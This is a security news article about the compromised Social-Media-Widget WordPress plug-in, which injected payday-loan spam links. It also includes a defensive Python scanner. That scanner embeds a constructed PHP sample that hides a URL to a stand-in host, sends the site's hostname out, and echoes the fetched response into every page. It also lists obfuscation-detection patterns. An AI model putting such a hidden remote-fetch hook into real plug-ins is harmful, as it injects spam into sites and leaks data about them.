A popular plug-in for sharing blog content on social networks was discovered to have hidden code that was injecting WordPress blogs with links to phony Pay Day Loan offers and other spam, according to the firm Sucuri.
The plug-in, named Social-Media-Widget (SMW), was compromised with malicious code 12 days ago, in concert with an update of the widget. The new version of the plug-in contained a hidden call to a remote PHP script that inserted “Pay Day Loan” spam text and links into WordPress web sites running the plug-in. The goal was to infect as many web sites as possible with text that would increase the web reputation and visibility of a web site run by the spammers, according to a post on Tuesday by Daniel Cid, Sucuri’s CTO.
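As an added illustration (not code from Sucuri, WordPress or the plug-in’s authors), the following Python triage script looks for the shape of the behaviour described above in plug-in PHP source: a call that fetches content from a remote URL and echoes it straight into the page, a URL literal split across string concatenations to hide it, and common obfuscation helpers. The PHP snippets it scans are constructed samples, and the pattern list is a heuristic starting point, not a complete indicator set.

```python
import os
import re

# Constructed sample sources (not the real Social Media Widget code).
CLEAN_PLUGIN = """<?php
function smw_buttons() {
    echo '<a href="https://twitter.com/share">Tweet</a>';
}
"""

# The shape the article describes: a remote PHP script is fetched and its
# response is written straight into every page, with the URL split to hide it.
SUSPICIOUS_PLUGIN = """<?php
function smw_footer() {
    $u = 'http://' . 'example.invalid' . '/s.php?h=' . $_SERVER['HTTP_HOST'];
    echo file_get_contents($u);
}
add_action('wp_footer', 'smw_footer');
"""

REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_exec|wp_remote_get|fsockopen)\s*\(", re.I)
OUTPUT_CALL = re.compile(r"\b(echo|print)\b", re.I)
SPLIT_URL = re.compile(r"['\"]https?://['\"]\s*\.", re.I)  # 'http://' . 'host' ...
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def scan_plugin_source(src):
    """Return [(line_no, reason), ...] for one PHP source string (heuristic)."""
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        if REMOTE_FETCH.search(line):
            reason = "remote fetch"
            if OUTPUT_CALL.search(line):  # response goes directly into the HTML
                reason += " echoed straight into the page"
            findings.append((no, reason))
        elif SPLIT_URL.search(line):
            findings.append((no, "URL literal split across concatenated strings"))
        elif OBFUSCATION.search(line):
            findings.append((no, "obfuscation or eval helper"))
    return findings

def scan_plugin_dir(root):
    """Walk a wp-content/plugins tree; map each .php path to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in files if f.endswith(".php")):
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_plugin_source(fh.read())
            if hits:
                report[path] = hits
    return report
```

Run `scan_plugin_dir("/path/to/wp-content/plugins")` on a copy of a site and review each hit by hand; legitimate plug-ins also fetch remote content, so a finding is a prompt to inspect, not proof of compromise.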
SMW is among the most popular add-ons for WordPress sites. It allows bloggers who use WordPress to configure sharing buttons that will appear on their blog and accompany each blog post, allowing readers to circulate the blog content out to social media websites or other blogs.
WordPress statistics show that it had been downloaded around 935,000 times through the end of March. The plug-in was the creation of Brian Freytag, a Michigan-based developer. In a post on Freytag’s personal blog dated January 15, however, he claims to have sold the widget to an “unnamed company for an unnamed sum,” saying he was unable to continue developing the free utility.
On Tuesday, someone using Freytag’s name left comments in a support forum for SMW that said he no longer has any involvement with the plug-in and expressed dismay at its use as a spamming tool.
“I just want to make it clear that I have not been the maintainer of Social Media Widget since January of 2013 (version 2.9.5),” the user claiming to be Freytag said. “I want the record to reflect that this issue arose months after I passed off the widget and have not had…access since signing over the widget in January.”
Freytag claims to have had a “discussion” with the party he sold the widget to, and says a freelance developer working on the plug-in “decided to go rogue or his password was cracked.” He did not immediately respond to a request for comment from The Security Ledger.
WordPress has since acted quickly to remove the plug-in from its official WordPress Plugin Repository. Sucuri recommends that WordPress sites using the plug-in remove it immediately.
Social sharing plug-ins like Social Media Widget are enormously popular in online publishing. However, they are also easy targets for scammers and can expose users to infection or unwanted tracking. The security firm Veracode warned in February about the security dangers of sharing plug-ins and released SmartShare, an internally developed and secure sharing utility. “Many sharing tools track users and gain access to valuable information, which is stored in user profile databases that can be breached,” Veracode said.